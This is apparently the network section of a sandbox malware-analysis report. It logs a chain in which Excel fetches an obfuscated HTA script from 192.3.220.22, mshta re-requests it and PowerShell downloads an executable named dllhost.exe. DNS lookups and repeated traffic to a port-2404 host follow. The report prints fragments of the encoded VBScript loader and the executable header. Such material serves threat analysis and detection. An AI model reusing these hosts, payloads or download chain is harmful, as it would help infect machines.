                                                                            Sep 30, 2024 09:57:01.545409918 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.545444012 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:02.141578913 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:05.951268911 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:05.951351881 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:13.504046917 CEST240449174107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:13.538753033 CEST491742404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:57:13.543587923 CEST240449174107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.354000092 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:57:27.366692066 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.366785049 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:57:27.374104977 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.374166965 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:57:27.379439116 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.379450083 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.379494905 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:57:27.386059999 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.386070967 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.386120081 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:57:27.392792940 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.392803907 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.392813921 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.392865896 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:57:27.393467903 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.399604082 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.399614096 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.399646044 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.399655104 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.399987936 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:57:27.621191025 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.624982119 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.625041008 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.625576973 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:27.625638008 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:57:43.630815983 CEST240449174107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:43.772330999 CEST491742404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:57:43.777230978 CEST240449174107.173.4.16192.168.2.22

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Sep 30, 2024 09:53:23.409651995 CEST5456253192.168.2.228.8.8.8
                                                                            Sep 30, 2024 09:53:23.420861959 CEST53545628.8.8.8192.168.2.22
                                                                            Sep 30, 2024 09:53:25.754252911 CEST5291753192.168.2.228.8.8.8
                                                                            Sep 30, 2024 09:53:25.767608881 CEST53529178.8.8.8192.168.2.22
                                                                            Sep 30, 2024 09:53:46.887208939 CEST6275153192.168.2.228.8.8.8
                                                                            Sep 30, 2024 09:53:47.061661959 CEST53627518.8.8.8192.168.2.22
                                                                            Sep 30, 2024 09:56:20.025681019 CEST5789353192.168.2.228.8.8.8
                                                                            Sep 30, 2024 09:56:20.035784006 CEST53578938.8.8.8192.168.2.22

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Sep 30, 2024 09:53:23.409651995 CEST192.168.2.228.8.8.80x96deStandard query (0)og1.inA (IP address)IN (0x0001)false
                                                                            Sep 30, 2024 09:53:25.754252911 CEST192.168.2.228.8.8.80x591bStandard query (0)og1.inA (IP address)IN (0x0001)false
                                                                            Sep 30, 2024 09:53:46.887208939 CEST192.168.2.228.8.8.80x5f1dStandard query (0)og1.inA (IP address)IN (0x0001)false
                                                                            Sep 30, 2024 09:56:20.025681019 CEST192.168.2.228.8.8.80x6070Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Sep 30, 2024 09:53:23.420861959 CEST8.8.8.8192.168.2.220x96deNo error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                            Sep 30, 2024 09:53:23.420861959 CEST8.8.8.8192.168.2.220x96deNo error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                            Sep 30, 2024 09:53:25.767608881 CEST8.8.8.8192.168.2.220x591bNo error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                            Sep 30, 2024 09:53:25.767608881 CEST8.8.8.8192.168.2.220x591bNo error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                            Sep 30, 2024 09:53:47.061661959 CEST8.8.8.8192.168.2.220x5f1dNo error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                            Sep 30, 2024 09:53:47.061661959 CEST8.8.8.8192.168.2.220x5f1dNo error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                            Sep 30, 2024 09:56:20.035784006 CEST8.8.8.8192.168.2.220x6070No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • og1.in
                                                                            • 192.3.220.22
                                                                            • geoplugin.net

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.2249164192.3.220.22803660C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            TimestampBytes transferredDirectionData
                                                                            Sep 30, 2024 09:53:24.782862902 CEST354OUTGET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1
                                                                            Accept: */*
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: 192.3.220.22
                                                                            Connection: Keep-Alive
                                                                            Sep 30, 2024 09:53:25.270328999 CEST1236INHTTP/1.1 200 OK
                                                                            Date: Mon, 30 Sep 2024 07:53:24 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                            Last-Modified: Sun, 29 Sep 2024 17:51:50 GMT
                                                                            ETag: "1ceb2-62345be2e2e61"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 118450
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/hta
                                                                            Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 [TRUNCATED]
                                                                            Data Ascii: <script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CSCrIPT%252520LaNGuage%25253D%252522VbsCRiPt%252522%25253E%25250ADiM%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                            Sep 30, 2024 09:53:25.270344973 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                            Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                            Sep 30, 2024 09:53:25.270355940 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                            Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                            Sep 30, 2024 09:53:25.270370007 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                            Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                            Sep 30, 2024 09:53:25.270380974 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                            Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                            Sep 30, 2024 09:53:25.270396948 CEST1120INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                            Sep 30, 2024 09:53:25.270409107 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 57 4d 73 4c 47 55 77 6e 62 53 6c 68 61 74 45 42 46 46 63 4c 79 54 52 55 48 78 68 69 76 4b 54 4e 46 44 70 47 56 69 6b 68 4e 45 6f 6a 68 69 44 72 53 53 76 77 57 4d 79 70 77 66 63 52 6f 77 4a 6b 42 55 61 75 4f 56
                                                                            Data Ascii: 52509%252509WMsLGUwnbSlhatEBFFcLyTRUHxhivKTNFDpGVikhNEojhiDrSSvwWMypwfcRowJkBUauOVNXYgiakvADcxUbXmyUVYFPBnBSfzjehxmkdmCGgtBOGliDuHZkzPyeewBmNhwMVcQwxMddOrPyYWRekmiNCupLRmTUUFxtZYHkCutufEzjytFEnpieACMLKZJqUKTanASaMYgFZtMyDpfgzhhMPayhDWi%252509%
                                                                            Sep 30, 2024 09:53:25.270421982 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                            Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                            Sep 30, 2024 09:53:25.270435095 CEST1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                            Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                            Sep 30, 2024 09:53:25.270447969 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                            Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                            Sep 30, 2024 09:53:25.275409937 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.2249166192.3.220.22803924C:\Windows\System32\mshta.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Sep 30, 2024 09:53:27.476290941 CEST431OUTGET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Language: en-US
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Range: bytes=8896-
                                                                            Connection: Keep-Alive
                                                                            Host: 192.3.220.22
                                                                            If-Range: "1ceb2-62345be2e2e61"
                                                                            Sep 30, 2024 09:53:27.893821001 CEST1236INHTTP/1.1 206 Partial Content
                                                                            Date: Mon, 30 Sep 2024 07:53:27 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                            Last-Modified: Sun, 29 Sep 2024 17:51:50 GMT
                                                                            ETag: "1ceb2-62345be2e2e61"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 109554
                                                                            Content-Range: bytes 8896-118449/118450
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/hta
                                                                            Data Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 [TRUNCATED]
                                                                            Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253A%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                            Sep 30, 2024 09:53:27.893845081 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                            Sep 30, 2024 09:53:27.893856049 CEST448INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                            Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                            Sep 30, 2024 09:53:27.893866062 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                            Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                            Sep 30, 2024 09:53:27.893877983 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                            Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                            Sep 30, 2024 09:53:27.893887997 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                            Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                            Sep 30, 2024 09:53:27.893910885 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                            Sep 30, 2024 09:53:27.893923044 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                            Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                            Sep 30, 2024 09:53:27.893933058 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                            Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                            Sep 30, 2024 09:53:27.893944979 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                            Sep 30, 2024 09:53:27.898921013 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                            Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.2249167192.3.220.22804032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Sep 30, 2024 09:53:34.034559965 CEST334OUTGET /430/dllhost.exe HTTP/1.1
                                                                            Accept: */*
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: 192.3.220.22
                                                                            Connection: Keep-Alive
                                                                            Sep 30, 2024 09:53:34.512454033 CEST1236INHTTP/1.1 200 OK
                                                                            Date: Mon, 30 Sep 2024 07:53:33 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                            Last-Modified: Sun, 29 Sep 2024 19:50:50 GMT
                                                                            ETag: "f1e30-6234767b79a80"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 990768
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/lnk
                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 27 95 75 59 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 2a 02 00 00 08 00 00 3d 33 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 0c 00 00 04 00 00 37 2f 0f 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 [TRUNCATED]
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPEL'uYd*=3@7/@.textmbd `.rdatah@@.data|@.ndata.rsrc@@
